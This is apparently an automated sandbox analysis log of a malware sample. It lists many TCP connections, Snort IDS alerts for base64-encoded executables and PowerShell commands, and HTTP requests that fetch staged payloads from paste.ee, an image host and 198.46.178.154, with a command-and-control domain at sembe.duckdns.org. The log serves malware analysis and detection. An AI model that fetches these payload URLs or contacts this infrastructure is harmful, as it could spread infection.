            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 198.46.178.154:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49172

            Networking

            Source: TrafficSnort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 188.114.97.3:443 -> 192.168.2.22:49174
            Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 188.114.97.3:443 -> 192.168.2.22:49174
            Source: TrafficSnort IDS: 2025012 ET TROJAN Powershell commands sent B64 3 188.114.97.3:443 -> 192.168.2.22:49174
            Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 188.114.97.3:443 -> 192.168.2.22:49174
            Source: TrafficSnort IDS: 2020423 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 198.46.178.154:80 -> 192.168.2.22:49175
            Source: TrafficSnort IDS: 2020424 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 198.46.178.154:80 -> 192.168.2.22:49175
            Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.97.3 443
            Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
            Source: Malware configuration extractorURLs: sembe.duckdns.org
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: sembe.duckdns.org
            Source: Yara matchFile source: 12.2.powershell.exe.93c0000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.502494701.00000000093C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 194.187.251.115:14645
            Source: incontrovertido.vbs.13.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
            Source: incontrovertido.vbs.13.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
            Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
            Source: global trafficHTTP traffic detected: GET /100500/HWE.txt HTTP/1.1Host: 198.46.178.154Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 54.241.153.192 54.241.153.192
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: global trafficHTTP traffic detected: GET /d/iuC2i HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
